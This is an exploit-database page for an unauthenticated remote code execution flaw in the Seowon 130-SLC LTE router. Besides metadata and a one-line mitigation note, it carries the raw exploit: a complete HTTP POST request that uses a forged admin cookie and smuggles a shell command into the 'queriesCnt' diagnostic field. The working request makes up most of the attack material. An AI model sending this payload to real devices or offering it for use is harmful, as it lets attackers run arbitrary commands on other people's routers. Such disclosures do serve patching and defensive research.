header-logo
Suggest Exploit
vendor:
130-SLC Router
by:
Aryan Chehreghani
9,8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: 130-SLC Router
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: Yes
Related CWE: N/A
CPE: h:seowonintech:130-slc_router
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10 Enterprise x64, Linux
2021

Seowon 130-SLC router – ‘queriesCnt’ Remote Code Execution (Unauthenticated)

A vulnerability in Seowon 130-SLC router allows an unauthenticated attacker to execute arbitrary commands without authentication as admin user. To exploit this vulnerability, the attacker only needs to enter the router IP and port (if available) in the request. The result of the request is visible on the browser page.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)
# Date: 2021-09-15
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: All Version
# Tested on: Windows 10 Enterprise x64 , Linux

# [ About - Seowon 130-SLC router ] :

#The SLC-130 series are all-in-one LTE CPE that delights you in handling multi-purpose environments that require data and WiFi,
#Its sophisticated and stable operation helps you excel yourself at office and home,
#Improve communication with excellence and ease your life.

# [ Description ]:

#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the request
#The result of the request is visible on the browser page

# [ Sample RCE Request ] :

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919
Content-Length: 183
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte;
cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0;
cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0;
cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
Connection: keep-alive

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928